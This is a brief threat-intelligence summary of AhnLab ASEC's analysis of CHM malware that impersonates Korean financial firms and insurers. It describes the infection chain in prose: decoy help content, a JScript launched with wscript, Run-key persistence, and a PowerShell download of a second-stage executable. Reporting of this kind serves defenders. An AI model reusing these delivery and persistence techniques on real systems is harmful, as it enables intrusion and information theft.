ASEC describes CHM malware distributed in RAR archives while impersonating Korean financial firms and insurers with decoy help-window content about card limits, insurance withdrawals, and bank contracts. When opened, the CHM script decompiled files to C:\Users\Public\Libraries, executed Docs.jse with wscript, and used a Run-key entry for persistence. The script then launched PowerShell to download an additional payload as %tmp%\alg.exe from multiple attacker-controlled URLs, although the payload servers were unavailable during analysis. AhnLab classified the samples as Dropper/CHM.Generic and warned that the final payload could enable information theft or other follow-on activity depending on what was retrieved.